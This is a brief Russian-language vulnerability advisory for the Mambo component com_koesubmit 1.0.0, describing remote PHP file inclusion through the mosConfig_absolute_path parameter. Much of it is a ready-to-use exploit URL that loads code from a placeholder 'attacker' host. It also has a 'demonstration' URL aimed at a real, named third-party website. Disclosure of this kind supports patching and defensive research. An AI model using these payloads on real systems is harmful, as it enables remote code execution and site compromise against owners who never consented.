Программа: Mambo Component com_koesubmit 1.0.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «mosConfig_absolute_path» сценарием koesubmit.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=attacker?

Демонстрация:

http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=



Оставить мнение